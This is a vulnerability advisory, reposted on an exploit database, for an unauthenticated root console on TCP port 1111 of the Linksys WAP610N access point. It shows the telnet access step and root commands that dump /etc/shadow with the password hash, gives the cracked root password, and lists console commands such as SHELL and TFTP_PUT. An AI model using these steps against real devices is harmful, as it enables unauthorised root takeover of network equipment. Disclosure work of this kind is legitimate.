Linksys WAP610N Unauthenticated Root Access Security Vulnerability

2011-02-10T00:00:00
ID 1337DAY-ID-15130
Type zdt
Reporter Matteo Ignaccolo
Modified 2011-02-10T00:00:00

Description

Exploit for hardware platform in category remote exploits

                                        
                                            Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo () securenetwork it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL:
http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt
 
 
*** SUMMARY ***
 
Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
 
Unauthenticated remote textual administration console has been found that
allow an attacker to run system command as root user.
 
 
*** VULNERABILITY DETAILS ***
 
telnet <access-point IP> 1111
 
Command> system id
Output>  uid=0(root) gid=0(root)
 
Coomand> system cat /etc/shadow
Ouptup>  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Ouptup>  bin:*:10933:0:99999:7:::
Ouptup>  daemon:*:10933:0:99999:7:::
Ouptup>  adm:*:10933:0:99999:7:::
Ouptup>  lp:*:10933:0:99999:7:::
Ouptup>  sync:*:10933:0:99999:7:::
Ouptup>  shutdown:*:10933:0:99999:7:::
Ouptup>  halt:*:10933:0:99999:7:::
Ouptup>  uucp:*:10933
 
root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)
 
List of console's command:
 
ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ      
HYP_WRITE     
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER
 
 
*** EXPLOIT ***
 
Attackers may exploit these issues through a common telnet client as explained
above.
 
 
*** FIX INFORMATION ***
 
No patch is available.
 
*** WORKAROUNDS ***
 
Put access points on separate wired network and filter network traffic to/from
1111 tcp port.
 


#  0day.today [2018-01-06]  #